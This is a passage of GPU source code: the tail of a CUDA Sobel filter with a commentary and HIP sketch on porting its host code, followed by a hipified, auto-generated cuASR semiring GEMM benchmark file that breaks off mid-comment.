imgIn[i + 2] * -1; imgOut[Index] = sqrtf(Gx * Gx + Gy * Gy) * 0.25; } return; } extern "C" bool apply_Sobel(cv::Mat * inputImage, cv::Mat * outputImage) { cudaError_t cudaStatus; unsigned char* deviceIn; unsigned char* deviceOut; int BLOCK_SIZE = 32; unsigned int imageSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); unsigned int gradientSize = inputImage->rows * inputImage->cols * sizeof(unsigned char); dim3 dimBlock(BLOCK_SIZE, BLOCK_SIZE); dim3 dimGrid(divCeil(inputImage->cols, BLOCK_SIZE), divCeil(inputImage->rows, BLOCK_SIZE)); cudaStatus = cudaMalloc(&deviceIn, imageSize); cudaStatus = cudaMalloc(&deviceOut, gradientSize); cudaStatus = cudaMemcpy(deviceIn, inputImage->data, imageSize, cudaMemcpyHostToDevice); kernel << <dimGrid, dimBlock >> > (deviceIn, deviceOut, inputImage->step1(), inputImage->rows); cudaStatus = cudaGetLastError(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "addKernel launch failed: %s\n", cudaGetErrorString(cudaStatus)); cudaFree(deviceIn); cudaFree(deviceOut); return cudaStatus; } cudaStatus = cudaDeviceSynchronize(); if (cudaStatus != cudaSuccess) { fprintf(stderr, "cudaDeviceSynchronize failed!"); cudaFree(deviceIn); cudaFree(deviceOut); return cudaStatus; } cudaStatus = cudaMemcpy(outputImage->data, deviceOut, gradientSize, cudaMemcpyDeviceToHost); cudaFree(deviceIn); cudaFree(deviceOut); return cudaStatus; }
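This Sobel pair shows the plain runtime-API rename (cudaError_t, cudaMalloc, cudaMemcpy and its kind enums, cudaGetLastError, cudaGetErrorString, cudaDeviceSynchronize, cudaFree to their hip counterparts) while the triple-chevron launch is kept, which hipcc also accepts. One quirk present in both versions: apply_Sobel is declared bool but returns the status enum, so a fully successful run (status 0) converts to false. A short sketch of that host pattern with an explicit success flag, using a hypothetical copy_kernel and run_filter in place of the Sobel code above:

#include "hip/hip_runtime.h"

__global__ void copy_kernel(const unsigned char* in, unsigned char* out, int n) {  // hypothetical stand-in kernel
    int i = blockIdx.x * blockDim.x + threadIdx.x;
    if (i < n) out[i] = in[i];
}

// Returns true only when every runtime call reports hipSuccess
// (the CUDA original would compare against cudaSuccess instead).
bool run_filter(const unsigned char* hostIn, unsigned char* hostOut, int n) {
    unsigned char *dIn = nullptr, *dOut = nullptr;
    size_t bytes = static_cast<size_t>(n);
    if (hipMalloc(&dIn, bytes) != hipSuccess) return false;
    if (hipMalloc(&dOut, bytes) != hipSuccess) { hipFree(dIn); return false; }
    bool ok = hipMemcpy(dIn, hostIn, bytes, hipMemcpyHostToDevice) == hipSuccess;
    dim3 block(256), grid((n + 255) / 256);
    copy_kernel<<<grid, block>>>(dIn, dOut, n);                    // hipcc accepts <<< >>> launches
    ok = ok && hipGetLastError() == hipSuccess;
    ok = ok && hipDeviceSynchronize() == hipSuccess;
    ok = ok && hipMemcpy(hostOut, dOut, bytes, hipMemcpyDeviceToHost) == hipSuccess;
    hipFree(dIn);
    hipFree(dOut);
    return ok;
}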
023df7b5c9b09af407347ce1efeb7ba7230c58e3.hip
// !!! This is a file automatically generated by hipify!!! /*************************************************************************************************** * Copyright (c) 2020, Vijay Thakkar ([email protected]). **************************************************************************************************/ ////////////////////////////////////////////////////////////////////// // THIS BENCHMARK FILE IS GENERATED AUTOMATICALLY : DO NOT MODIFY // ////////////////////////////////////////////////////////////////////// #include "benchmark/benchmark.h" #include "cuasr/gemm/device/default_srgemm_configuration.h" #include "cuasr/gemm/device/srgemm.h" #include "cuasr/functional.h" #include "harness.h" //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x32x1_2x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = 
Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x32x1_4x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x64x1_4x8_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 0) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // 
cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x32x1_8x4_4x8_1x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x32x8_8x16x1_2x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 8 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<8, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = 
cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_8x64x8_8x32x1_2x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_16x16x1_4x2_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = 
cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x64x8_16x32x1_4x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 8 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 16 x 128 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 128, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 64, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x128x8_16x64x1_4x8_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 4 x 4 // Threads / Warp: 8 x 4 // Warps / Block: 1 x 2 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void 
BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_32x16x1_4x4_8x4_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 1 x 2 // Threadblock: 32 x 64 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 64, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x64x8_32x32x1_8x4_4x8_1x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / 
Thread: 4 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 32 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<32, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<16, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_32x32x8_16x32x1_4x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 8 x 4 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 1 // Threadblock: 64 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 1) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<64, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<32, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } 
BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_64x32x8_32x32x1_8x4_4x8_2x1) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 x 2 // Threads / Warp: 4 x 8 // Warps / Block: 2 x 2 // Threadblock: 16 x 32 x 8 #if defined(CUASR_BENCH_LEVEL) and (CUASR_BENCH_LEVEL >= 2) static void BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2(benchmark::State &state) { const auto N = static_cast<int>(state.range(0)); using precision = double; using OpClass = cutlass::arch::OpClassSimt; using SmArch = cutlass::arch::Sm50; using ThreadblockShape = cutlass::gemm::GemmShape<16, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 16, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using Config = typename cuasr::gemm::device::DefaultSemiRingConfiguration< // precision, precision, precision, precision, OpClass, // cuasr::maximum<precision>, cuasr::multiplies<precision>, SmArch>; using AddOp = Config::AdditionOp; using MultOp = Config::MultiplicationOp; using EpilogueOutputOp = Config::EpilogueOutputOp; using Srgemm = cuasr::gemm::device::Srgemm< // AddOp, MultOp, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, cutlass::layout::ColumnMajor, // precision, OpClass, SmArch, // ThreadblockShape, WarpShape, InstructionShape, EpilogueOutputOp, // cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; // setup bench harness cuasr::bench::device::BenchHarness<Srgemm> bench({ N, N, N }); // benchmark loop for (auto _ : state) { benchmark::DoNotOptimize(bench.run()); hipDeviceSynchronize(); } double flops_per_itr = 2.0 * N * N * N; state.counters["Flop/s"] = benchmark::Counter(flops_per_itr, benchmark::Counter::kIsIterationInvariantRate); } BENCHMARK(BM_SM50_device_maximum_multiplies_dsrgemm_nn_n_16x32x8_8x16x1_2x2_4x8_2x2) ->RangeMultiplier(2)->Range(256, 4096); #endif //////////////////////////////////////////////////////////////////////////////// // Elements / Thread: 2 